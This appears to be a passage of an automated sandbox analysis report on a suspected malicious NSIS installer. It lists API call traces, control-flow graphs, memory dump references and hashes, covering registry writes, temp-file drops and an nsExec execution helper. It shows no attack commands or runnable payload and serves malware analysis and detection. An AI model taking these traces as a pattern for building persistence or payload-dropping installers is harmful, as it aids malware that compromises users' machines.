                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsp7359.tmp\nsExec.dll$C:\Users\user\AppData\Local\magmaet\clenched$ExecToStack$artikulationer\Udsorteringerne
                                                                                                                    • API String ID: 1941528284-1256000645
                                                                                                                    • Opcode ID: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
                                                                                                                    • Instruction ID: 6fe11ac43b73c0a2a9a7664c997375d2890861868a1009608a3dd96d2534e176
                                                                                                                    • Opcode Fuzzy Hash: 024041f0cf3f6ab180763ea1ae22c75af16c428f23fa9b29c0d9da4ba2c35ac7
                                                                                                                    • Instruction Fuzzy Hash: B141B531900515BFCF10BBB5CC46DAE7679EF05328B20823BF422B51E1DB3C86529A6E

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 626 4052e2-4052f7 627 4052fd-40530e 626->627 628 4053ae-4053b2 626->628 629 405310-405314 call 4061a5 627->629 630 405319-405325 lstrlenW 627->630 629->630 632 405342-405346 630->632 633 405327-405337 lstrlenW 630->633 635 405355-405359 632->635 636 405348-40534f SetWindowTextW 632->636 633->628 634 405339-40533d lstrcatW 633->634 634->632 637 40535b-40539d SendMessageW * 3 635->637 638 40539f-4053a1 635->638 636->635 637->638 638->628 639 4053a3-4053a6 638->639 639->628
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                    • lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                    • lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                    • SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                    • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                    • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                    • String ID: Completed
                                                                                                                    • API String ID: 2531174081-3087654605
                                                                                                                    • Opcode ID: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                                    • Instruction ID: 5ed309c8d3f1bf46da027166848d039c97de4a2eecd53fde705ce25c05ecf2d8
                                                                                                                    • Opcode Fuzzy Hash: 249834775a828849fb4d2b6e85db5a2f2ebd467982b82e73c19976ad16bb4df1
                                                                                                                    • Instruction Fuzzy Hash: 4A21B075900618BBCB119FA5DD44ACFBFB8EF84390F10803AF904B62A0C7B94A51DF68

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 640 4057b1-4057fc CreateDirectoryW 641 405802-40580f GetLastError 640->641 642 4057fe-405800 640->642 643 405829-40582b 641->643 644 405811-405825 SetFileSecurityW 641->644 642->643 644->642 645 405827 GetLastError 644->645 645->643
                                                                                                                    APIs
                                                                                                                    • CreateDirectoryW.KERNELBASE(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\), ref: 004057F4
                                                                                                                    • GetLastError.KERNEL32 ref: 00405808
                                                                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040581D
                                                                                                                    • GetLastError.KERNEL32 ref: 00405827
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D7
                                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004057D8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.
                                                                                                                    • API String ID: 3449924974-4205471118
                                                                                                                    • Opcode ID: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                                    • Instruction ID: 9d8b3aa145bda6eaeb46bbd44b0caf250caa68881350f4f3315e0aaa1c0c1a31
                                                                                                                    • Opcode Fuzzy Hash: 7075ef3404a36deb5860a48c063ce1528caeb3231ff3312c7ad9e757cbb6b53e
                                                                                                                    • Instruction Fuzzy Hash: 400108B1D00619EADF10DBA0D9087EFBFB8EF04314F00803AD945B6190D77996588FA9

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 646 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 653 4023c7-4023cf 646->653 654 402a4c-402a5b 646->654 655 4023d1-4023de call 402bbf lstrlenW 653->655 656 4023e2-4023e5 653->656 655->656 660 4023f5-4023f8 656->660 661 4023e7-4023f4 call 402ba2 656->661 664 402409-40241d RegSetValueExW 660->664 665 4023fa-402404 call 4030e7 660->665 661->660 667 402422-4024fc RegCloseKey 664->667 668 40241f 664->668 665->664 667->654 668->667
                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                    • lstrlenW.KERNEL32(artikulationer\Udsorteringerne,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                    • String ID: artikulationer\Udsorteringerne
                                                                                                                    • API String ID: 1356686001-2681483848
                                                                                                                    • Opcode ID: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
                                                                                                                    • Instruction ID: 75ab489ca3c386883e02df54fe3069bb457763bdb47647990c5a7a2e11d383c6
                                                                                                                    • Opcode Fuzzy Hash: 6e5ea9d93eb3cb9a957931279c0ba2d85e54e050eb0ba23687cbe03c42da21f9
                                                                                                                    • Instruction Fuzzy Hash: B8118E71A00108BFEB10AFA5DE89EAE777DEB44358F11403AF904B71D1D6B85E409668

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 671 402bff-402c28 RegOpenKeyExW 672 402c93-402c97 671->672 673 402c2a-402c35 671->673 674 402c50-402c60 RegEnumKeyW 673->674 675 402c62-402c74 RegCloseKey call 406559 674->675 676 402c37-402c3a 674->676 683 402c76-402c85 675->683 684 402c9a-402ca0 675->684 678 402c87-402c8a RegCloseKey 676->678 679 402c3c-402c4e call 402bff 676->679 681 402c90-402c92 678->681 679->674 679->675 681->672 683->672 684->681 686 402ca2-402cb0 RegDeleteKeyW 684->686 686->681 688 402cb2 686->688 688->672
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1912718029-0
                                                                                                                    • Opcode ID: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                                    • Instruction ID: 55d087fd23a1ea4965d22b091416ffa41740a626a207a29a44af1da89c0b6843
                                                                                                                    • Opcode Fuzzy Hash: ee17cb36fc74d046e0919beb455f6a1255652c66a39e7c6080990b88bc0e6a76
                                                                                                                    • Instruction Fuzzy Hash: B3116771504118FFEF20AF90DF8CEAE3B79FB14384B10043AF905B20A0D7B48E55AA29

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 689 405c3f-405c5a call 406183 call 405be2 694 405c60-405c6d call 406417 689->694 695 405c5c-405c5e 689->695 699 405c7d-405c81 694->699 700 405c6f-405c75 694->700 696 405cb8-405cba 695->696 702 405c97-405ca0 lstrlenW 699->702 700->695 701 405c77-405c7b 700->701 701->695 701->699 703 405ca2-405cb6 call 405b37 GetFileAttributesW 702->703 704 405c83-405c8a call 4064c6 702->704 703->696 709 405c91-405c92 call 405b83 704->709 710 405c8c-405c8f 704->710 709->702 710->695 710->709
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00406183: lstrcpynW.KERNEL32(0040A230,0040A230,00000400,00403466,00429260,NSIS Error), ref: 00406190
                                                                                                                      • Part of subcall function 00405BE2: CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405BF0
                                                                                                                      • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                                      • Part of subcall function 00405BE2: CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                                    • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0,"C:\Users\user\Desktop\RmIYOfX0yO.exe"), ref: 00405C98
                                                                                                                    • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0), ref: 00405CA8
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                    • String ID: 4ou.ou$P_B
                                                                                                                    • API String ID: 3248276644-2741302951
                                                                                                                    • Opcode ID: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                                    • Instruction ID: f871c4b29d4d639395b2ac54a4c1991ea156a0950635a8c86b9a322ad60a2328
                                                                                                                    • Opcode Fuzzy Hash: aac1f31e4ea679f556b64dc22f6bcb2e43e03c5f2aa30b7a8abbf531c7fd0fee
                                                                                                                    • Instruction Fuzzy Hash: 32F0F42510CF111AF62233365D09AAF2558CF82764B5A063FFC51B12D1CA3C9A838C7E

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 712 406050-406082 RegOpenKeyExW 713 4060c4-4060c7 712->713 714 406084-4060a3 RegQueryValueExW 712->714 715 4060b1 714->715 716 4060a5-4060a9 714->716 717 4060b4-4060be RegCloseKey 715->717 716->717 718 4060ab-4060af 716->718 717->713 718->715 718->717
                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040607A
                                                                                                                    • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 0040609B
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 004060BE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID: : Completed
                                                                                                                    • API String ID: 3677997916-2954849223
                                                                                                                    • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                    • Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
                                                                                                                    • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                                    • Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 719 405d87-405d93 720 405d94-405dc8 GetTickCount GetTempFileNameW 719->720 721 405dd7-405dd9 720->721 722 405dca-405dcc 720->722 724 405dd1-405dd4 721->724 722->720 723 405dce 722->723 723->724
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00405DA5
                                                                                                                    • GetTempFileNameW.KERNELBASE(0040A230,?,00000000,?,?,?,00000000,004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405DC0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                    • API String ID: 1716503409-2042855515
                                                                                                                    • Opcode ID: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                                    • Instruction ID: 39f60503b2430839de46f7700192694fdf55f3390a305a77e996ee432cf1c3a1
                                                                                                                    • Opcode Fuzzy Hash: a547c736c8f6b5c9f15055ff18df3ea68e155a79a10597bb1e750add09701d99
                                                                                                                    • Instruction Fuzzy Hash: 00F01D76701608BFDB108F59DD09A9BB7A8EFA5710F10803BEA41E7190E6B49A54CB64
                                                                                                                    APIs
                                                                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                                    • wsprintfW.USER32 ref: 0040653F
                                                                                                                    • LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
